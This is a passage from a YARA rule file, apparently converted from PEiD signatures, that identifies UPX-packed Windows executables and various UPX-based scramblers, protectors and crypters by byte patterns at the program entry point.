}\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_02_UPX_06_Anorganix: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122: PEiD\r\n{\r\n strings:\r\n $a = { 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 8A 07 72 EB B8 01 ?? ?? ?? 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 }\r\n $b = { 80 7C 24 08 01 0F 85 ?? ?? ?? 00 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_Modified_Stub_b_Farb_rausch_Consumer_Consulting_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 BE ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 66 ?? ?? ?? ?? ?? ?? 57 83 ?? ?? 31 DB EB }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v080_v084: PEiD\r\n{\r\n strings:\r\n $a = { 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB }\r\n $b = { 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 ?? ?? ?? 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 EF 75 09 8B 1E 83 EE FC }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule SkD_Undetectabler_Pro_20_No_UPX_Method_SkD: PEiD\r\n{\r\n strings:\r\n $a = { 55 8B EC 83 C4 F0 B8 FC 26 00 10 E8 EC F3 FF FF 6A 0F E8 15 F5 FF FF E8 64 FD FF FF E8 BB ED FF FF 8D 40 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v103_v104_Modified_additional: PEiD\r\n{\r\n strings:\r\n $a = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB 8A 07 ?? EB B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v20_Markus_Laszlo_Reiser: PEiD\r\n{\r\n strings:\r\n $a = { 55 FF 96 ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB ?? FF 96 ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? 00 00 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 }\r\n $b = { 55 FF 96 ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB ?? FF 96 ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? 00 00 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_V194_Markus_Oberhumer_amp_Laszlo_Molnar_amp_John_Reiser: PEiD\r\n{\r\n strings:\r\n $a = { FF D5 80 A7 ?? ?? ?? ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_0896_102_PE: PEiD\r\n{\r\n strings:\r\n $a = { 60 BE 00 00 00 00 8D BE 00 00 00 FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 31 C9 83 E8 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule Unknown_UPX_modifyer: PEiD\r\n{\r\n strings:\r\n $a = { E8 02 00 00 00 CD 03 5A 81 C2 ?? ?? ?? ?? 81 C2 ?? ?? ?? ?? 89 D1 81 C1 3C 05 00 00 52 81 2A 33 53 45 12 83 C2 04 39 CA 7E F3 89 CA 8B 42 04 8D 18 29 02 BB 78 56 00 00 83 EA 04 3B 14 24 7D EC C3 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_030_EXE: PEiD\r\n{\r\n strings:\r\n $a = { 8C CB B9 00 00 BE 00 00 89 F7 1E A9 B5 80 8D 87 05 00 8E D8 05 00 00 8E C0 FD F3 A5 FC 2E 80 6C 13 10 73 E8 AF AD 0E 0E 0E 06 1F 07 16 68 00 00 BD FF FF F7 E1 93 CB 55 50 58 21 04 03 02 07 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPXHiT_v001: PEiD\r\n{\r\n strings:\r\n $a = { 94 BC ?? ?? ?? 00 B9 ?? 00 00 00 80 34 0C ?? E2 FA 94 FF E0 61 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule Password_Protector_for_the_UPX_030_g0d_additional: PEiD\r\n{\r\n strings:\r\n $a = { C8 50 01 00 60 E8 EC 00 00 00 00 47 65 74 4D 6F 64 75 6C 65 48 61 6E 64 6C 65 41 00 00 55 53 45 52 33 32 2E 64 6C 6C 00 44 69 61 6C 6F 67 42 6F 78 49 6E 64 69 72 65 63 74 50 61 72 61 6D 41 00 53 65 6E 64 4D 65 73 73 61 67 65 41 00 45 6E 64 44 69 61 6C 6F 67 00 00 00 55 8B EC 57 BF 00 00 00 00 33 C0 81 6D 0C 10 01 00 00 75 03 40 EB 13 83 7D 0C 01 75 0D 66 83 7D 10 0B 75 0B FF 75 14 8F 47 E4 5F 5D C2 10 00 66 83 7D 10 02 77 F4 74 0E 8D 4F A0 51 6A 40 6A 0D FF 77 E4 FF 57 E8 50 FF 75 08 FF 57 EC EB DB 84 08 C8 90 00 00 00 00 01 00 64 00 64 00 64 00 14 00 00 00 00 00 45 00 6E 00 74 00 65 00 72 00 20 00 50 00 61 00 73 00 73 00 77 00 6F 00 72 00 64 00 00 00 A0 00 00 50 00 00 02 00 05 00 05 00 5A 00 0A 00 0B 00 FF FF 81 00 00 00 00 00 5E FC 8D BE AA FE FF FF 8D 86 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_0896_PE_DLL: PEiD\r\n{\r\n strings:\r\n $a = { 80 7C 24 08 01 0F 85 00 00 00 00 60 BE 1A 00 00 00 8D BE E6 00 00 FF 57 83 CD FF EB 0D 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Protector_v10x_additional: PEiD\r\n{\r\n strings:\r\n $a = { EB ?? ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_02_UPX_06: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_072_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 83 CD FF 31 DB 5E }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_290_LZMA_Delphi_stub_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n strings:\r\n $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? C7 87 ?? ?? ?? ?? ?? ?? ?? ?? 57 83 CD FF 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_200_Markus_Laszlo: PEiD\r\n{\r\n strings:\r\n $a = { 32 2E 30 30 00 55 50 58 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v103_v104_Laszlo_Markus: PEiD\r\n{\r\n strings:\r\n $a = { ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 8A 07 72 EB B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 ?? 75 ?? 8B 1E 83 EE FC }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v30_DLL_LZMA_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n strings:\r\n $a = { 80 7C 24 08 01 0F 85 C7 0B 00 00 60 BE 00 ?? ?? ?? 8D BE 00 ?? ?? FF 57 89 E5 8D 9C 24 80 C1 FF FF 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_SCRAMBLER_306_OnToL_additional: PEiD\r\n{\r\n strings:\r\n $a = { E8 00 00 00 00 59 83 C1 07 51 C3 C3 BE ?? ?? ?? ?? 83 EC 04 89 34 24 B9 80 00 00 00 81 36 ?? ?? ?? ?? 50 B8 04 00 00 00 50 03 34 24 58 58 83 E9 03 E2 E9 EB D6 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPXHiT_001_DJ_Siba: PEiD\r\n{\r\n strings:\r\n $a = { E2 FA 94 FF E0 61 00 00 00 00 00 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_com_additional: PEiD\r\n{\r\n strings:\r\n $a = { B9 ?? ?? BE ?? ?? BF C0 FF FD }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Shit_v01_500mhz: PEiD\r\n{\r\n strings:\r\n $a = { E8 00 00 00 00 5E 83 C6 14 AD 89 C7 AD 89 C1 AD 30 07 47 E2 FB AD FF E0 C3 00 ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 01 ?? ?? ?? 00 55 50 58 2D 53 68 69 74 20 76 30 2E 31 20 2D 20 77 77 77 2E 62 6C 61 63 6B 6C 6F 67 69 63 2E 6E 65 74 20 2D 20 63 6F 64 65 20 62 79 }\r\n $b = { E8 00 00 00 00 5E 83 C6 14 AD 89 C7 AD 89 C1 AD 30 07 47 E2 FB AD FF E0 C3 00 ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 01 ?? ?? ?? 00 55 50 58 2D 53 68 69 74 20 76 30 2E 31 20 2D 20 77 77 77 2E 62 6C 61 63 6B 6C 6F 67 69 63 2E 6E 65 74 20 2D 20 63 6F 64 65 20 62 79 20 5B 35 30 30 6D 68 7A 5D }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v070_Laszlo_Markus: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 8D B0 EC 01 ?? ?? 83 CD FF 31 DB EB 07 90 8A 06 46 88 07 47 01 DB 75 07 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_200_30X_Markus_Oberhumer_Laszlo_Molnar_John_Reiser: PEiD\r\n{\r\n strings:\r\n $a = { 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 88 D8 E2 D9 8D ?? ?? ?? ?? ?? 8B 07 09 C0 74 3C 8B 5F 04 8D ?? ?? ?? ?? ?? ?? 01 F3 50 83 C7 08 FF ?? ?? ?? ?? ?? 95 8A 07 47 08 C0 74 DC 89 F9 57 48 F2 AE 55 FF ?? ?? ?? ?? ?? 09 C0 74 07 89 03 83 C3 04 EB E1 FF ?? ?? ?? ?? ?? 8B AE ?? ?? ?? ?? 8D BE 00 F0 FF FF BB 00 10 00 00 50 54 6A 04 53 57 FF D5 8D 87 ?? ?? ?? ?? 80 20 7F 80 60 28 7F 58 50 54 50 53 57 FF D5 58 61 8D 44 24 80 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n $b = { 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 88 D8 E2 D9 8D ?? ?? ?? ?? ?? 8B 07 09 C0 74 3C 8B 5F 04 8D ?? ?? ?? ?? ?? ?? 01 F3 50 83 C7 08 FF }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_093_UnHack32_11: PEiD\r\n{\r\n strings:\r\n $a = { 60 BE 00 80 43 00 8D BE 00 90 FC FF C7 87 D0 64 04 00 26 81 74 8D 57 83 CD FF EB 0E 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_093_UnHack32_12: PEiD\r\n{\r\n strings:\r\n $a = { 60 BE 00 A0 43 00 8D BE 00 70 FC FF C7 87 D0 84 04 00 98 C1 DF 2D 57 83 CD FF EB 0E 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule Upx_v12_Marcus_Lazlo: PEiD\r\n{\r\n strings:\r\n $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF EB 05 A4 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 F2 31 C0 40 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 75 07 8B 1E 83 EE FC 11 DB 73 E6 31 C9 83 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Protector_v10x_2_additional: PEiD\r\n{\r\n strings:\r\n $a = { EB ?? ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v062_DLL: PEiD\r\n{\r\n strings:\r\n $a = { 80 7C 24 08 01 0F 85 95 01 00 00 60 E8 00 00 00 00 58 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPXFreak_v01_Borland_Delphi_HMX0101: PEiD\r\n{\r\n strings:\r\n $a = { BE ?? ?? ?? ?? 83 C6 01 FF E6 00 00 00 ?? ?? ?? 00 03 00 00 00 ?? ?? ?? ?? 00 10 00 00 00 00 ?? ?? ?? ?? 00 00 ?? F6 ?? 00 B2 4F 45 00 ?? F9 ?? 00 EF 4F 45 00 ?? F6 ?? 00 8C D1 42 00 ?? 56 ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? 24 ?? 00 ?? ?? ?? 00 }\r\n $b = { BE ?? ?? ?? ?? 83 C6 01 FF E6 00 00 00 ?? ?? ?? 00 03 00 00 00 ?? ?? ?? ?? 00 10 00 00 00 00 ?? ?? ?? ?? 00 00 ?? F6 ?? 00 B2 4F 45 00 ?? F9 ?? 00 EF 4F 45 00 ?? F6 ?? 00 8C D1 42 00 ?? 56 ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 00 ?? 24 ?? 00 ?? ?? ?? 00 34 50 45 00 ?? ?? ?? 00 FF FF 00 00 ?? 24 ?? 00 ?? 24 ?? 00 ?? ?? ?? 00 40 00 00 C0 00 00 ?? ?? ?? ?? 00 00 ?? 00 00 00 ?? 1E ?? 00 ?? F7 ?? 00 A6 4E 43 00 ?? 56 ?? 00 AD D1 42 00 ?? F7 ?? 00 A1 D2 42 00 ?? 56 ?? 00 0B 4D 43 00 ?? F7 ?? 00 ?? F7 ?? 00 ?? 56 ?? 00 ?? ?? ?? ?? ?? 00 00 00 ?? ?? ?? ?? ?? ?? ?? 77 ?? ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 77 ?? ?? 00 00 ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? 00 00 ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 00 00 00 ?? ?? ?? 00 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_Inliner_v10_by_GPcH: PEiD\r\n{\r\n strings:\r\n $a = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 D5 FE FF FF 8B 06 83 F8 00 74 11 8D B5 E1 FE FF FF 8B 06 83 F8 01 0F 84 F1 01 00 00 C7 06 01 00 00 00 8B D5 8B 85 B1 FE FF FF 2B D0 89 95 B1 FE FF FF 01 95 C9 FE FF FF 8D B5 E5 FE FF FF 01 }\r\n $b = { 9C 60 E8 00 00 00 00 5D B8 B3 85 40 00 2D AC 85 40 00 2B E8 8D B5 D5 FE FF FF 8B 06 83 F8 00 74 11 8D B5 E1 FE FF FF 8B 06 83 F8 01 0F 84 F1 01 00 00 C7 06 01 00 00 00 8B D5 8B 85 B1 FE FF FF 2B D0 89 95 B1 FE FF FF 01 95 C9 FE FF FF 8D B5 E5 FE FF FF 01 16 8B 36 8B FD 60 6A 40 68 00 10 00 00 68 00 10 00 00 6A 00 FF 95 05 FF FF FF 85 C0 0F 84 06 03 00 00 89 85 C5 FE FF FF E8 00 00 00 00 5B B9 31 89 40 00 81 E9 2E 86 40 00 03 D9 50 53 E8 3D 02 00 00 61 03 BD A9 FE FF FF 8B DF 83 3F 00 75 0A 83 C7 04 B9 00 00 00 00 EB 16 B9 01 00 00 00 03 3B 83 C3 04 83 3B 00 74 2D 01 13 8B 33 03 7B 04 57 51 52 53 FF B5 09 FF FF FF FF B5 05 FF FF FF 56 57 FF 95 C5 FE FF FF 5B 5A 59 5F 83 F9 00 74 05 83 C3 08 EB CE 68 00 80 00 00 6A 00 FF B5 C5 FE FF FF FF 95 09 FF FF FF 8D }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_070_PE: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 66 81 87 00 00 00 00 00 00 8D B0 EC 01 00 00 83 CD FF 31 DB EB 07 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Scrambler_by_GurueXe: PEiD\r\n{\r\n strings:\r\n $a = { 66 C7 05 ?? ?? ?? ?? 75 07 E9 ?? FE FF FF 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 ?? ?? 00 00 00 ?? ?? 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_099_100_101_PE_DLL: PEiD\r\n{\r\n strings:\r\n $a = { 80 7C 24 08 01 0F 85 00 00 00 00 60 BE AE 00 00 00 8D BE 52 00 00 FF 57 83 CD FF EB 0D 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v071_v072: PEiD\r\n{\r\n strings:\r\n $a = { 80 7C 24 08 01 0F 85 ?? 60 BE 8D BE 57 83 CD }\r\n $b = { 60 E8 00 00 00 00 83 CD FF 31 DB 5E 8D BE FA ?? ?? FF 57 66 81 87 ?? ?? ?? ?? ?? ?? 81 C6 B3 01 ?? ?? EB 0A ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v122_DLL_Laszlo_Markus: PEiD\r\n{\r\n strings:\r\n $a = { 80 7C 24 08 01 0F 85 ?? ?? ?? 00 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 83 CD FF }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_com_Hint_DOS_EP: PEiD\r\n{\r\n strings:\r\n $a = { B9 ?? ?? BE ?? ?? BF C0 FF FD }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v062_Hint_WIN_EP: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 ?? ?? ?? ?? 58 83 ?? ?? 50 8D ?? ?? ?? ?? ?? 57 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 83 ?? ?? 31 DB ?? ?? ?? EB }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_V200_V290_Markus_Oberhumer_Laszlo_Molnar_John_Reiser_additional: PEiD\r\n{\r\n strings:\r\n $a = { FF D5 8D 87 ?? ?? ?? ?? 80 20 ?? 80 60 ?? ?? 58 50 54 50 53 57 FF D5 58 61 8D 44 24 ?? 6A 00 39 C4 75 FA 83 EC 80 E9 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v124_Markus_Laszlo_overlay: PEiD\r\n{\r\n strings:\r\n $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 EB 0B 90 8A 06 46 88 07 47 01 DB 75 ?? 8B 1E 83 ?? ?? 11 DB 72 ?? B8 01 00 00 00 01 DB 75 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_SCRAMBLER_306: PEiD\r\n{\r\n strings:\r\n $a = { E8 00 00 00 00 59 83 C1 07 51 C3 C3 BE ?? ?? ?? ?? 83 EC 04 89 34 24 B9 80 00 00 00 81 36 ?? ?? ?? ?? 50 B8 04 00 00 00 50 03 34 24 58 58 83 E9 03 E2 E9 EB D6 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPXLock_v10_CyberDoom: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 ?? ?? ?? ?? 5D 81 ED ?? ?? ?? ?? 60 E8 2B 03 00 00 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPXHiT_v001_additional: PEiD\r\n{\r\n strings:\r\n $a = { 94 BC ?? ?? ?? 00 B9 ?? 00 00 00 80 34 0C ?? E2 FA 94 FF E0 61 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Shit_01_500mhz: PEiD\r\n{\r\n strings:\r\n $a = { E8 00 00 00 00 5E 83 C6 14 AD 89 C7 AD 89 C1 AD 30 07 47 E2 FB AD FF E0 C3 00 ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 01 ?? ?? ?? 00 55 50 58 2D 53 68 69 74 20 76 30 2E 31 20 2D 20 77 77 77 2E 62 6C 61 63 6B 6C 6F 67 69 63 2E 6E 65 74 20 2D 20 63 6F 64 65 20 62 79 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0896_v102_v105_v124_Markus_Laszlo_overlay_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 EB 0B 90 8A 06 46 88 07 47 01 DB 75 ?? 8B 1E 83 ?? ?? 11 DB 72 ?? B8 01 00 00 00 01 DB 75 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule PseudoSigner_01_UPX_06_Anorganix: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 00 00 00 FF 57 8D B0 E8 00 00 00 E9 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Shit_01_500mhz_additional: PEiD\r\n{\r\n strings:\r\n $a = { E8 00 00 00 00 5E 83 C6 14 AD 89 C7 AD 89 C1 AD 30 07 47 E2 FB AD FF E0 C3 00 ?? ?? 00 ?? ?? ?? 00 ?? ?? ?? 01 ?? ?? ?? 00 55 50 58 2D 53 68 69 74 20 76 30 2E 31 20 2D 20 77 77 77 2E 62 6C 61 63 6B 6C 6F 67 69 63 2E 6E 65 74 20 2D 20 63 6F 64 65 20 62 79 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Protector_v10x: PEiD\r\n{\r\n strings:\r\n $a = { EB EC ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 }\r\n $b = { EB ?? ?? ?? ?? ?? 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB }\r\n condition:\r\n for any of ($*) : ( $ at pe.entry_point )\r\n\r\n}\r\nrule UPX_v060_v061_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 58 83 E8 3D 50 8D B8 ?? ?? ?? FF 57 8D B0 E8 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_Shit_06_snaker: PEiD\r\n{\r\n strings:\r\n $a = { B8 ?? ?? ?? ?? B9 15 00 00 00 80 34 08 ?? E2 FA E9 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v081_v084_Modified_additional: PEiD\r\n{\r\n strings:\r\n $a = { 01 DB ?? 07 8B 1E 83 EE FC 11 DB ?? ED B8 01 00 00 00 01 DB ?? 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 77 EF }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_050_070_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 E8 00 00 00 00 58 83 E8 3D }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_040_051_EXE: PEiD\r\n{\r\n strings:\r\n $a = { 8C CB B9 00 00 BE 00 00 89 F7 1E A9 B5 80 8D 87 05 00 8E D8 05 00 00 8E C0 FD F3 A5 FC 2E 80 6C 13 10 73 E8 00 00 00 00 00 0E 0E 00 00 00 00 00 00 00 00 00 00 00 00 55 50 58 21 05 00 02 07 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_081_083_EXE: PEiD\r\n{\r\n strings:\r\n $a = { B9 00 00 BE 00 00 89 F7 1E A9 B5 80 8C C8 05 05 00 8E D8 05 00 00 8E C0 FD F3 A5 FC 2E 80 6C 12 10 73 E7 92 AF AD 0E 0E 0E 06 1F 07 16 BD 00 00 BB 00 80 55 CB 55 50 58 21 0A 03 03 07 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_293_300_LZMA: PEiD\r\n{\r\n strings:\r\n $a = { 60 BE ?? ?? ?? ?? 8D BE ?? ?? ?? ?? 57 89 E5 8D 9C 24 ?? ?? ?? ?? 31 C0 50 39 DC 75 FB 46 46 53 68 ?? ?? ?? ?? 57 83 C3 04 53 68 ?? ?? ?? ?? 56 83 C3 04 53 50 C7 03 03 00 02 00 90 90 90 90 90 }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_v0761_pe_exe_additional: PEiD\r\n{\r\n strings:\r\n $a = { 60 BE ?? ?? ?? ?? 8D ?? ?? ?? ?? ?? 66 ?? ?? ?? ?? ?? ?? 57 83 ?? ?? 31 DB EB }\r\n condition:\r\n $a at pe.entry_point\r\n\r\n}\r\nrule UPX_200_30X_Markus_Oberhumer_Laszlo_Molnar_John_Reiser_additional: PEiD\r\n{\r\n strings:\r\n $a = { 5E 89 F7 B9 ?? ?? ?? ?? 8A 07 47 2C E8 3C 01 77 F7 80 3F ?? 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07 83 C7 05 88 D8 E2 D9 8D ?? ?? ?? ?? ?? 8B 07 09 C0 74 3C 8B 5F 04 8D ?? ?? ?? ?? ?? ?? 01 F3 50 83 C7 08 FF ?? ?? ?? ?? ?? 95 8A 07 47 08 C0 74 DC 89 F9 57 48 F2 AE 55 FF ?? ?? ?? ?? ?? 09 C0 74 07 89 03 83 